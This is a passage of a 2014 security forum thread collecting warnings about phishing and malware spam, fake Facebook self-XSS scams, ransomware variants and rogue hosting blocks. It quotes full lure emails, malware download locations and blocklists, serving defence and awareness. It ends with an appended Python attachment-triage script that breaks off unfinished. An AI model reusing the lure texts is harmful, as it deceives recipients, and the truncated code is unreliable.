16 April 2014 - "Last week I wrote about a rogue netblock hosted by Network Operation Center* in the US. Well, it's still spreading malware but now there are -more- domains active on this range. A full list of the subdomains I can find is listed here [pastebin**]. I would recommend that you apply the following blocklist:
66.96.223.192/27
andracia .net ..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2014/04/something-evil-on-669622319227.html

** http://pastebin.com/RQfE69hn
___

Netflix-themed tech support SCAM ...
- http://blog.malwarebytes.org/fraud-scam/2014/04/netflix-themed-tech-support-scam-comes-back-with-more-copycats/
April 16, 2014 - "A few weeks ago we blogged about this Netflix phishing scam -combined- with fake tech support that was extorting private information and money from people. The scam worked by asking unsuspecting users to log into their Netflix account and enter their username and password into a -fraudulent- website. After collecting the personal details, the perpetrators used a fake warning to state the particular account had been suspended. All this effort was really about leading potential victims into a trap, by making them call a 1-800 number operated by -fake- tech support agents ready to social engineer their mark and collect their credit card details. A slightly new variant is once again making the rounds with the same goal of funnelling traffic to -bogus- ‘customer support’ hotlines:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/blurred_netflix.png
... this time around the scammers behind it are expanding the phishing pages to other online services as well to target a wider audience. Crooks are buying online ads for each brand such as this one on Bing for “netflix tech support number”:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/bingad1.png
... The quality of leads you get from targeted advertising is much higher than that from random cold calls. If you can attract people already looking for help and offer them your service, chances are conversion rates will be higher..."

:fear: :mad:

AplusWebMaster
2014-04-18, 14:26
FYI...

Fake Facebook Chat Verification used for SPAM
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-facebook-chat-verification-used-for-spam/
Apr 17, 2014 - "Facebook users are once again the target of a malicious scheme—this time in the form of a notification about “Facebook Chat”. The spammed notification pretends to come from the “official Facebook Chat Team.” A notification shows users of a tagged comment to a Facebook Note containing a fake announcement about a Facebook Chat verification requirement.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/FB-chat-spam1.jpg
The spam tries to sound urgent to convince users to verify their accounts. To do so, they are first asked to go to a Pastebin URL and are instructed to copy a specific code. The set of instructions differs depending on what browser is being used (Google Chrome, Mozilla Firefox, or Internet Explorer). Users are then directed to a shortened link and are asked to press a particular function key (F12 for Google Chrome users, for example). After clicking on the console tab, users are supposed to paste the provided JavaScript code into the address bar, then press Enter. This actually gives bad guys access to the user’s account, giving them the capability to auto-tag anyone in the users’ friends list and start the cycle of victimizing other account users... From the get-go, users should know that there is -no- product called “Facebook Chat,” let alone a team that sends out a supposed “advisory” to its users. The social media site’s official instant messaging feature is called Facebook Messenger, which is also the name of its stand-alone app. Earlier this month, Facebook announced* that Android and iOS users will be required to use this stand-alone app by eliminating the chat features of the traditional app versions of the site. Facebook has taken action against threats like this by releasing an official announcement. The official Facebook warning** notes, “This is a variant on the self-XSS attack. By pasting the code in the browser console, the user gives the code access to their account. The code usually posts the same scam on other people’s walls, and subscribes the user to pages controlled by the attacker – but it could do much worse things”..."
* http://mashable.com/2014/04/09/facebook-requiring-messenger/

** https://www.facebook.com/selfxss
___

Zeus with your coffee ...
- https://www.securelist.com/en/blog/8207/Would_you_like_some_Zeus_with_your_coffee
Apr 16, 2014 - "Cybercriminals often like to use a bogus letter to trick people into opening malicious attachments. There are two tricks that make this work: a message from a familiar name (a bank, social network, service provider or other organization that might interest the recipient) and an intriguing or alarming subject. An attack based on -fake- messages supposedly from coffee chain Starbucks combined the two.
> https://www.securelist.com/en/images/vlweblog/blog_vergelis_starbucks.jpg
The detected distribution claimed... a recipient's friend made an order for him to celebrate a special occasion in a Starbucks coffee shop. That mysterious friend wished to remain anonymous, enjoying the intrigue he was creating, but was sending out invitations with details of a special menu, which is available in the attachment. In the end they wished the recipient an awesome evening. All the messages were sent out with high importance. Besides, the addresses, created on the Gmail and Yahoo! free mail services, changed from letter to letter and seemed to be randomly generated combinations like incubationg46@, mendaciousker0@ and so on. The attachment was a .exe file and the cybercriminals made no effort to mask it with an archive or double filename extension. They seemed to be sure a happy recipient would open the attachment without any suspicion. Kaspersky Lab detects the attached file as Rootkit.Win32.Zbot.sapu - a modification of one of the most notorious spyware families, Zbot (ZeuS). These applications are used by cybercriminals to steal confidential information. This version of Zbot is able to install a rootkit, Rootkit.Win32.Necurs or Rootkit.Win64.Necurs, which disrupts the functioning of antiviruses or other security solutions."
___

Google patches Android icon Hijacking vuln
- http://www.securityweek.com/google-patches-android-icon-hijacking-vulnerability
Apr 15, 2014 - "Researchers at FireEye have identified a vulnerability affecting Google Android that could be exploited to lead users to malicious sites. According to FireEye*, the issue allows a malicious app with 'normal' protection level permissions to target legitimate icons on the Android home screen and modify them to point to attack sites or the malicious app itself without notifying the user. The issue has been acknowledged by Google, which has released a patch to its OEM partners..."
* http://www.fireeye.com/blog/technical/2014/04/occupy_your_icons_silently_on_android.html
Apr 14, 2014

- https://atlas.arbor.net/briefs/index#-561580891
Elevated Severity
17 Apr 2014

:fear: :mad:

AplusWebMaster
2014-04-22, 12:53
FYI...

Fake Santander Bank SPAM – word doc malware
- http://myonlinesecurity.co.uk/santander-bank-march-invoice-fake-word-doc-malware/
Apr 22, 2014 - "March Invoice pretending to be from Santander bank with a sender address of Sarah Gandolfo [sgand0395@ aol.com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
Please find attached your March invoice, we now have the facility to email invoices, but if you are not happy with this and would like a hard copy please let me know.
New bank details for BACS payments are Santander Bank Sort Code 271201 Account No 56024641.
Thanks very much
Sarah

22 April 2014: March invoice 5291.zip ( 10kb) Extracts to March invoice 8912.exe
Current Virus total detections: 1/51*. This March Invoice is another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe/analysis/
___

Visa Card phish ...
- http://www.hoax-slayer.com/visa-card-status-notification-phishing-scam.shtml
Apr 22, 2014 - "... email purporting to be from Visa claims that the recipient's card access has been limited because 'unusual activity' has been detected... The email is -not- from Visa. It is a -scam- designed to steal the recipient's credit card data. A link in the email opens a -fake- website that asks for the user's credit card number, and other information pertaining to the recipient's Visa account...
Example:
Subject: Access to your Visa card has been blocked
Visa Card Status Notification
We are contacting you to Inform you that our Visa Card security department identified some unusual activity in your card. In accordance with Visa Card User Agreement and to ensure that your Visa Card has not been accessed from fraudulent locations, access to your Visa Card has been limited. Your Visa Card access will remain limited until this issue has been resolved please Click My Visa Card Activity to continue.
My Visa Card Activity
We take your online safety seriously, which is why we use state of the art notification systems to identify unusual activity and a challenge process to validate your details.
Thanks for banking with Visa.
Customer Finance Department
© Visa & Co, 2014.

Screenshot: http://www.hoax-slayer.com/images/visa-card-status-notification-phishing-scam-1.jpg

The message invites users to -click- a link to resolve the issue and restore access... the message is -not- from Visa and the claim that the account has been limited is a lie... the email is a typical phishing scam designed to extract financial information from users. The email's links open a -bogus- website created to closely mirror the look and feel of a genuine Visa webpage. The fake page will include a 'verification form' that requests users to supply their credit card number and other account details. After supplying the requested information, users will be taken to a second fake page that informs them that the problem has been resolved and restrictions have been removed... of course, there was no problem with the card to begin with..."
___

Fake 'Paintball Booking' SPAM ...
- http://blog.mxlab.eu/2014/04/22/paintball-booking-confirmation-email-will-infect-your-computer-with-trojan/
Apr 22, 2014 - "... new trojan distribution campaign by email with the subject “Paintball Booking Confirmation”. This email is sent from the spoofed address “”ipguk52@ paintballbookingoffice .com” <ipguk@ paintballbookingoffice .com>” and has the following body:
Dear client,
Many thanks for your booking on Saturday 19/04/2014 at our Reading Paintball centre Mapledurham, Reading. Arrival time is 09:15AM prompt.
Please view the attached booking confirmation, map and important game day documents prior to attending.
Kind regards,
Leigh Anderson
Event Co-ordinator...

The attached ZIP file has the name Booking Confirmation 2826-66935.zip, once extracted a folder Booking Confirmation 0414-28921 is created which contains the 14 kB large file Booking Confirmation 0414-28921.exe. The trojan is known as Win32:Dropper-gen [Drp], W32/Trojan.ZLGD-2681, Trojan:W32/Zbot.BBLB or HEUR/Malware.QVM07.Gen. At the time of writing, 4/51 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe "
* https://www.virustotal.com/en/file/4c69e3b6d2f7dbaf78eacfd60f2de685da9d942fdf9c1ff7ae4b88be17075fbe/analysis/

** https://malwr.com/analysis/YmI4MmFlNDQ4ZmYzNDczNzlmZjNiYWU1ODMyMmMyZGQ/

:mad: :fear:

AplusWebMaster
2014-04-28, 23:12
FYI...

Massive cyber wire fraud attacks on US Companies
- https://www.trustedsec.com/april-2014/red-alert-massive-cyber-wire-fraud-attacks-us-companies/
April 25, 2014 - "... a number of US companies have been impacted, and unfortunately, a number of companies that are still unaware they were victim of this attack. A major offensive is currently happening on a number of United States based companies, mostly involving those that have international components. TrustedSec notified law enforcement that multiple companies are affected, and these attacks are aimed at extracting money from the companies. An ongoing and active case is in progress working with the companies affected and investigating the incidents... high success rate. They appear to have different escalation models and ways to force organizations to perform the transfer without triggering suspicion. They use a combination of social-engineering (both email and phone), compromising trusted partners/third parties, and spoofing email addresses in order to accomplish their goals...
What you can do:
1. Notify your financial and accounts payable departments of these attacks and the techniques.
2. Verify all transactions with your third party partners and vendors, especially when refunding money (phone calls directly to a known phone number).
3. Provide enhanced education and awareness of these types of attacks.
4. If you have fallen victim to this attack, notify your local FBI office immediately...
Measures should be taken right -now- in order to educate your finance and accounts payable departments as well as an emphasis on controls in place for your third party partners and vendors."
(More detail at the trustedsec URL above.)

:fear: :mad:

AplusWebMaster
2014-05-01, 23:26
FYI...

Something evil on 146.185.213.69 ...
- http://blog.dynamoo.com/2014/05/something-evil-on-14618521369-and.html
1 May 2014 - "146.185.213.69 caught my eye, hosting a number of "ads." subdomains, many of which are tagged by Google as being malicious... you can probably assume that all those domains are malicious (even without the ads. prefix)... The block is owned by RN Data SIA of Latvia and suballocated to somebody in St Petersburg by the name of Mikhail Evgenyevich Valyalov. RN Data are one of those hosts that have hosted malware in the past*, and I tend to lean towards blocking them... frankly this entire /24 looks like it is being used for evil purposes at the moment and I recommend that you block it..." [146.185.213.*]
* http://blog.dynamoo.com/2011/10/some-tdltdss-rootkit-sites-to-block.html
(More detail at the dynamoo URL above.)
___

Fake Malwarebytes 2.0 ...
- http://blog.malwarebytes.org/security-threat/2014/05/fake-malwarebytes-anti-malware-2-0-abound/
May 1, 2014 - "... we already started seeing fake executable files purporting to be free versions of our product being hosted on unfamiliar sites.
A small sample of rogue files we found in the wild:
> http://blog.malwarebytes.org/wp-content/uploads/2014/04/samples.png
One of the many sites that host MBAM PUPs:
> http://blog.malwarebytes.org/wp-content/uploads/2014/04/fake-site.png
... we found that these files have common behaviours: they all enable themselves to run whenever Windows is restarted or the system is turned on and they’re capable of accessing private information that browsers store whenever we go online, such as data pertaining to cookies, browsing history, and list of restricted sites... Several of these samples also create entries to IE’s restricted sites zone, consequently blocking users from accessing specific domains...
Sample of MBAM Installation GUI (taken from malwr.com):
> http://blog.malwarebytes.org/wp-content/uploads/2014/05/MWB-sample.png
For anyone interested in trying out MBAM 2.0, the wisest thing to do is still to go to our official download site*..."
* https://www.malwarebytes.org/downloads/

:mad: :fear:

AplusWebMaster
2014-05-05, 20:58
FYI...

Android "Police Locker" ransomware ...
- http://net-security.org/malware_news.php?id=2759
5.05.2014 - "Android users might soon become victims of "Police Locker" ransomware, if they haven't already, warns the researcher behind the Malware don't need Coffee blog*. "The 'Reveton team' has diversified its locking activity," he informs us. "The advert is old (2014-02-18) but i decided to write about it today as I found a Traffic Distribution System (TDS) using almost all features proposed by this affiliate including the Android locker." Other options for malware delivery include system lockers, fake AV, fake codecs, and Browlock ransomware. The researcher discovered a threat actor that uses a TDS that employs almost all features: if you land on a malicious site using Internet Explorer, a variant of the Winlock ransomware is served. If you land with another browser on Windows, Linux or Mac, you'll get Brownlock. Finally, if you land on it with Android, you will be redirected to a fake adult website that will automatically push the download of a malicious APK file masquerading as a video downloader app (and using the icon of the legitimate BaDoink Video Downloader). The good news is that the user must approve the installation... The 'fine' US users are asked to pay in order to get their phones unlocked is $300, payable via Money Pak... The malware is detected... as Trojan Koler**, and the researcher has already spotted another threat actor delivering it. In this case, the malicious APK masquerades as the popular BSPlayer video player for Android."
* http://malware.dontneedcoffee.com/2014/05/police-locker-available-for-your.html

** https://www.virustotal.com/en/file/e1099a20bb6a253ffd4570b557ba60172ea448542a7aa7318cd5b1a160b8517d/analysis/1399286001/
Detection ratio: 4/52
___

Bank of America CashPro Spam
- http://threattrack.tumblr.com/post/84831159013/bank-of-america-cashpro-spam
May 5, 2014 - "Subjects Seen:
FW: Important account documents
Typical e-mail details:
Please scan attached document and fax it to +1 (888) 589-1001.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.
Yours faithfully
Vince Blue

Malicious File Name and MD5:
Account_Documents.zip (40E7BB684935A7B86E5D8E480974F691)
Account Documents.scr (6E40CD3BB6F1F531CDCE113A8C684B08)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/58d19a8d9d49219537830ad39178a449/tumblr_inline_n53y3hEgvd1r6pupn.png

Tagged: Bank of America, Upatre
___

Encrypting Ransomware ...
- http://www.webroot.com/blog/2014/05/05/evolution-encrypting-ransomware/
May 5, 2014 - "... big change in the encrypting ransomware family... For those that aren’t aware of what encrypting ransomware is, it's a cryptovirus that encrypts all your data from local hard drives, network shared drives, removable hard drives and USB. The encryption is done using an RSA-2048 asymmetric public key which makes decryption without the key impossible. Paying the ransom will net you the key which in turn leads to getting your data back.
Cryptolocker:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/cryptolocker5.png
(Other samples at the first webroot URL above.)
In its first evolution of what we know as “Cryptolocker” the encryption key was actually stored on the computer and the victim, with enough effort, could retrieve said key. Then you could use tools submitted on forums to put in your key and decrypt all your data without paying the ransom. In future improvements malware authors made sure that the only place the key was stored was on a secure server so that you were forced to pay. However, more often than not the malicious dropper didn’t delete the VSS (Volume Shadow Service) and victims still had the option to manually restore files from a previous date using programs like Shadow Explorer (OS drive only). For those that don’t know what the VSS is, it’s a restorative feature that is included in XP SP2 and later versions of Windows. Essentially it is a technology that allows taking manual or automatic backup copies of data and is related to system restore. In newer variants of Cryptolocker the VSS is almost always deleted at deployment. Malware authors also give the victim a special extended period of time to get their files if they waited past the deadline, but the price usually doubles or triples.
CryptoDefense:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/cryptolocker7.png
(Other samples at the first webroot URL above.)
In one of the more recent variants of encryption ransomware dubbed “CryptoDefense” it no longer has a graphical user interface (GUI). Instead the malware will just open a webpage after encryption and leave a text file at every directory that was encrypted. The instructions to get the key to decrypt your files have you install anonymous tor or other layered encryption browsers so you can pay them directly and securely. This enables malware authors to circumvent a portion of the Zeus fraud, avoid the need for money mules (middle man) and increase the percentage of profit.
DirCrypt:
> https://www.webroot.com/blog/wp-content/uploads/2014/05/dircrypt.png
In this most recent change in encrypting ransomware, instead of going after various file extensions, all files are encrypted into RTF documents with a *.enc.rtf extension. This one really blindsides the victim as you’ll get no pop-up GUI or webpage once encryption completes; you have to open one of your documents to find that it was encrypted. All documents will have the same content similar to what is shown. One big improvement that is quite nasty for victims is the encryption is no longer a static one time deal. This variant will actively seek out and encrypt any new or modified files written to drives. We noticed while testing a collected sample that when we attempted to save screenshots, that it immediately encrypted them. We expect future encrypting ransomware variants to include these tactics as the evolution continues..."

:mad::mad: :fear:

AplusWebMaster
2014-05-06, 22:39
FYI...

Hacked WordPress site - ccccooa .org
- http://blog.dynamoo.com/2014/05/ccccooaorg-another-hacked-wordpress-site.html
6 May 2014 - "ccccooa .org ("Cumberland County Council on Older Adults") is another hacked WordPress site being used to serve pharma spam. I got -82- of these all at the same time..
From: Linkedln Email Confirmation [emailing@ compumundo .info]
Reply-To: emailing@ compumundo .info
To: topsailes@ gmail .com
Date: 6 May 2014 13:41
Subject: Please confirm your email address
Linkedln
Click here to confirm your email address.
You will be asked to log into your account to confirm this email address. Be sure to log in with your current primary email address.
We ask you to confirm your email address before sending invitations or requesting contacts at Linkedln. You can have several email addresses, but one will need to be confirmed at all times to use the system.
If you have more than one email address, you can choose one to be your primary email address. This is the address you will log in with, and the address to which we will deliver all email messages regarding invitations and requests, and other system mail.
Thank you for using Linkedln!
--The Linkedln Team
This email was intended for [redacted]. Learn why we included this...

One example landing URL is [donotclick]www.ccccooa .org/buyphentermine/ which leads to a sort of intermediary landing page..
> https://3.bp.blogspot.com/-yHYRE10WZKE/U2iyLsDXtXI/AAAAAAAAC9Q/sX68XuZLzYw/s1600/fake-rx-1.png
This in turn goes to a -redirect- at [donotclick]stylespanel .com/h/go/phentermine.php and then to [donotclick]www.hq-pharmacy-online .com/search.html?q=phentermine which is a -fake- pharmacy site hosted on 95.211.228.240 (LeaseWeb, Netherlands) which is registered to a probably fake address in Argentina. Avoid.. oh, and if you run a WordPress site please make sure the software is up-to-date."
___

BT Digital File - SPAM
- http://blog.dynamoo.com/2014/05/important-bt-digital-file-spam.html
6 May 2014 - "This -fake- BT spam comes with a malicious attachment:
Date: Tue, 6 May 2014 15:18:15 +0700 [04:18:15 EDT]
From: Santiago Biggs [Santiago.Biggs@ bt .com]
Subject: Important - BT Digital File
BT Digital Vault BT
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
If you have any questions or forgotten your password, please visit the "Frequently Asked Questions" at www.bt .com/personal/digitalvault/help or call the helpdesk on 0870 240 1116* between 8am and midnight.
Thank you for choosing BT Digital Vault.
Kind regards,
BT Digital Vault Team ...
Please note that this is an automatically generated email for your information only. We are sorry, but we can not respond to a "Reply" to this address...

Screenshot: https://2.bp.blogspot.com/-3lQPEJML0rA/U2i3EZQnyXI/AAAAAAAAC9c/eTXtmThsu-Q/s1600/bt.png

Attached to the message is an archive file BT_Digital_Vault_File.zip which in turn contains a malicious executable BT_Digital_File.scr which has a VirusTotal detection rate of 11/52*. Automated analysis tools... show that this malware downloads additional components from the following locations:
[donotclick]realtech-international .com/css/0605UKdp.rar
[donotclick]biz-ventures .net/scripts/0605UKdp.rar
Blocking those URLs or monitoring for them may help to prevent further infection."
* https://www.virustotal.com/en/file/8b910ac5a4f15c278e3e32386612e24454d05abfd2b08e374b12da5149ba690f/analysis/1399371324/
___

Fake MMS message – jpg malware
- http://myonlinesecurity.co.uk/new-mms-message-fake-jpg-malware/
6 May 2014 - "... message pretending to come from 01552521415@ mmsreply.t-mobile .co .uk [NBdnO_0K0Cb8VYiYEpV8ozYauXw7swqpIiIs6nK3@ mmsreply.t-mobile .co .uk] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Email reads:
our message:
Guess what I forgot *handoverface*, see attached pic
Sending a reply:
You can reply by email to this mobile number within the next 7 days.
The total message size should not exceed 300kb.
You can only reply once, and it must be within 7 days of receiving this message...

Today's Date: PIC000444182547.zip (53 kb) Extracts to PIC000983339211.jpeg.exe
Current Virus total detections: 6/52*
... another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper jpg file instead of the .exe file it really is... look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/b7e3aee53ffebd6b0c58e59c64bb146967b63b25ce1d0987ebc1ee87e8bc47fd/analysis/
___

Fake Payment error SPAM – malware
- http://myonlinesecurity.co.uk/payment-error-25393592410-malware/
6 May 2014 - "Payment error #25393592410 pretending to come from Orville Creasy [payment@ rachelwarne .co .uk] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Email looks like :
This e-mail has been sent to you to inform you that we were unable to process your most recent payment #570475658997219860277606
Please check attached file for more detailed information on this transaction.
Pay To Account Number: 8843867223806343
Date: 2014-05-05 15:19:19 UTC.
Transaction ID: 25393592410
Amount Due: £ 1060.45
Orville Creasy,
+07957419543

The number on the email subject is different in every email as are the transaction numbers, the pay to account number, the amount due and alleged sender and his/her phone number. The email senders are all different and the only thing in common is that they all pretend to be sent from payment @ some random named but real company. The companies have not been hacked. They just use the name of a company from a long list... unless you have “show known file extensions” enabled, will look like a file with an icon of a £ sign pretending to be a specialised invoice instead of the .exe file it really is..."

:fear::fear: :mad::mad:

AplusWebMaster
2014-05-07, 12:32
FYI...

Fake invoice file attachment SPAM
- http://blog.dynamoo.com/2014/05/this-email-contains-invoice-file.html
7 May 2014 - "Another case of a very terse spam with a malicious email attachment:
Date: Wed, 7 May 2014 14:06:46 +0700 [03:06:46 EDT]
From: Accounts Dept [menopausaln54@ jaygee .co .uk]
Subject: Email invoice: 1888443
This email contains an invoice file attachment

... The attachment is emailinvoice.069911.zip which in turn contains a malicious executable emailinvoice.899191.exe which has a VirusTotal detection rate of 5/52*. Automated analysis tools of this binary... show that it downloads a further component... This "111.exe" binary has an even lower VirusTotal detection rate of 3/51**. Automated analysis of this... shows the malware installs itself deeply into the target system. There is a further download of a malicious binary from files.karamellasa .gr/tvcs_russia/2.exe which has a detection rate of 5/50*** and identifies as a variant of Zeus. This creates fake svchost.exe and csrss.exe executables on the target system..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/c5bd87f921d3a162d5d79a472ebee697fb88748f60ee47d9b2ea1d5b2714fc90/analysis/1399448792/

** https://www.virustotal.com/en-gb/file/94d3a69c238f43d299ec715e014d3e1cb7f6abe3f7fcf7837e3dba89fcd10384/analysis/1399450008/

*** https://www.virustotal.com/en-gb/file/54bd07e5ddcd04bdc746060bfc7ddfe7d20b77a167a44760a4aabec03d499819/analysis/1399450683/
___

Fake Lloyds Banking BACs – fake PDF malware
- http://myonlinesecurity.co.uk/lloyds-commercial-banking-important-bacs-fake-pdf-malware/
7 May 2014 - "Lloyds Commercial Banking Important BACs pretending to be from Lloyds Commercial Banking [Ora.Hutchison@ lloydsbank .com] is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers... Email looks like:
Important account documents
Reference: C96 Case number: 0746481
Please review attached BACs documents and fax it to +44 (0) 845 600 9454.
Please note that the Terms and Conditions available below are the Bank’s most recently issued versions. Please bear in mind that earlier versions of these Terms and Conditions may apply to your products, depending on when you signed up to the relevant product or when you were last advised of any changes to your Terms and Conditions. If you have any questions regarding which version of the Terms and Conditions apply to your products, please contact your Relationship Manager.
Yours faithfully
Adrienne Mcdermott Senior Manager, Lloyds Commercial Banking ...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/05/lloyds-Important-BACs.png

7 May 2014 : LloydsCase-8948231.zip ( 11kb) Extracts to LloydsCase-07052014.scr
Current Virus total detections: 3/51*
... another one of the spoofed icon files that unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is... make sure you have “show known file extensions” enabled, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened."
* https://www.virustotal.com/en/file/1b9b7a7a3d81a8956281ff7e13d553b52fd484509588b4bcc0d97f5f831156c3/analysis/
___

Fake "TNT UK Limited" SPAM
- http://blog.dynamoo.com/2014/05/tnt-uk-limited-spam.html
7 May 2014 - "This -fake- TNT spam has a malicious attachment:
Date: Wed, 7 May 2014 01:50:00 -0600 [03:50:00 EDT]
From: TNT COURIER SERVICE [tracking@tnt.co.uk]
Subject: TNT UK Limited - Package tracking 236406937389
TNT COURIER SERVICE (TCS)
Customer/Delivery Services Department
Central Pk Est/Mosley Rd, Trafford Park
Manchester, M17 1TT UK.
DETAILS OF PACKAGE
Reg order no: GB5766211
Your package have been picked up and is ready for dispatch. Please print attached form
and pick up at the nearest office.
Connote # : 236406937389
Service Type : Export Non Documents - Intl
Shipped on : 07 Apr 13 00:00
Order No : 5766211
Status : Driver's Return Description : Wrong Postcode ...

The attachment is GB5766211.zip which contains the malicious executable GB07052014.scr (note the date is encoded into the filename). This has a VirusTotal detection rate of 7/52*. Automated analysis tools... show a UDP connection to wavetmc .com and a further binary download from demo.providenthousing .com/wp-content/uploads/2014/05/b01.exe . This second executable has a VirusTotal detection rate of 20/51**. The Malwr report and Anubis report both show attempted connection to various mail servers (e.g. Gmail and Hotmail). Furthermore the Anubis report shows a data transfer to 83.172.8.59 (Tomsk Telecommunication Company, Russia).
Recommended blocklist:
83.172.8.59
wavetmc .com
demo.providenthousing .com"
* https://www.virustotal.com/en-gb/file/1b9b7a7a3d81a8956281ff7e13d553b52fd484509588b4bcc0d97f5f831156c3/analysis/1399452001/

** https://www.virustotal.com/en-gb/file/e7468b216fe8ea9010a3e739daeb4b39642a24d87f3f98ccf28b4293bf6196d1/analysis/1399452578/
___

More PUPs - using Instagram as Lure
- http://blog.malwarebytes.org/security-threat/2014/05/more-pups-sighted-using-instagram-as-lure/
May 7, 2014 - "... In the case of Instagram, what we’ve seen out there could pose greater risk than, say, your average phishing site. Doing a Google search surely yields sites where one can download several programs involving Instagram. Some of which can either be classed as “image viewers” or “image and video downloaders” publicly-accessible accounts. Most of the files I sampled below belong to the latter:
> http://blog.malwarebytes.org/wp-content/uploads/2014/05/instagram.png
Since Instagram can be visited via Web browsers, we can easily say that these downloads target any Windows computer user who just wants to keep copies of photos and videos that are likely not their own. We ran these potentially unwanted programs (PUPs) on VirusTotal and got the following...
1) https://www.virustotal.com/en/file/d6495ffb6a0c388ae4d5b81c16ef4bdaee4604491b21d857d0955378336d4c84/analysis/1398865443/
2) https://www.virustotal.com/en/file/d6495ffb6a0c388ae4d5b81c16ef4bdaee4604491b21d857d0955378336d4c84/analysis/1398865443/
3) https://www.virustotal.com/en/file/d65fd9b672bfc1093df20f0b9a7c6f812426c7b45085d04137d07b4a794830ba/analysis/1398864970/
(More listed at the malwarebytes URL at the top.)
... Internet slowdown, unwanted redirection to sites and possible installation of other programs without the user’s consent are just some of the obvious signs users may experience once these programs are installed. Like what we always advise our blog readers, please avoid downloading such programs onto your system as doing so will increase its security risks..."
___

Fake Google+ Survey - Phish ...
- http://www.hoax-slayer.com/fraudulent-verification-survey-phishing-scam.shtml
May 7, 2014 - "Email purporting to be from the 'All Domain Mail Team' at Google+ asks recipients to participate in a 'spam and fraudulent verification survey'. The email is -not- from Google+ or anybody else at Google. It is a phishing scam designed to trick users into giving their Google account login details to criminals...

Screenshot: http://www.hoax-slayer.com/images/fraudulent-verification-survey-phishing-scam-1.jpg

... claims to be from the 'All Domain Mail Team' at Google's social network Google+. It claims that the team is running a 'spam and fraudulent verification survey' and asks users to click a link to participate. It warns that if the verification survey is 'not gotten' within 24 hours, the team will assume that the recipient is a 'fraulent user' and his or her email account will be shut down... These login details will be collected by criminals and used to hijack the Google accounts belonging to the victims. The one set of login credentials can be used to access many different Google services. Thus, the criminals may be able to steal private information stored in various Google applications as well as use Gmail and Google+ accounts to launch further spam and scam campaigns..."

:mad::mad: :fear:
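
A triage check for the attachment pattern that runs through the posts above (a zip that extracts to an .exe or .scr, often behind a decoy .jpeg/.pdf name and a spoofed icon), as an added example that is not code from any of the quoted sources. The archive it inspects is constructed inline with fake "MZ" stubs in place of real programs; the extension lists are a partial selection, not a complete policy.

```python
"""Triage a ZIP email attachment for the disguised-executable pattern
in the posts above: a .exe/.scr payload, often behind a decoy document
extension (.jpeg.exe, .pdf.exe) and a spoofed icon.

Added example, not code from any quoted source. The archive inspected
here is constructed inline; member contents are fake stubs, not malware."""
import io
import zipfile
from pathlib import PurePosixPath

# Extensions Windows runs as programs when double-clicked (partial list)
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".jar"}
# Document/image extensions used as decoys in front of the real one
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".jpg", ".jpeg", ".png", ".txt"}


def _looks_like_pe(head: bytes) -> bool:
    """Windows PE files start with the 'MZ' DOS stub signature."""
    return head[:2] == b"MZ"


def triage_zip(data: bytes) -> list:
    """Return one finding dict per suspicious member: {"member", "reasons"}."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = PurePosixPath(info.filename).name  # drop any folder prefix
            suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
            last = suffixes[-1] if suffixes else ""
            with zf.open(info) as fh:
                head = fh.read(2)  # only the magic bytes are needed
            reasons = []
            if last in EXEC_EXTS:
                reasons.append("executable extension " + last)
                if len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS:
                    reasons.append("decoy double extension " + "".join(suffixes[-2:]))
            elif _looks_like_pe(head):
                reasons.append("PE header behind non-executable extension")
            if reasons:
                findings.append({"member": name, "reasons": reasons})
    return findings


def build_sample_zip() -> bytes:
    """Constructed archive mimicking the attachments quoted above."""
    fake_pe = b"MZ" + b"\x00" * 62  # DOS header stub only, not a program
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Booking Confirmation 0414-28921/Booking Confirmation 0414-28921.exe", fake_pe)
        zf.writestr("PIC000983339211.jpeg.exe", fake_pe)
        zf.writestr("LloydsCase-07052014.scr", fake_pe)
        zf.writestr("invoice.pdf", fake_pe)  # PE bytes behind a .pdf name
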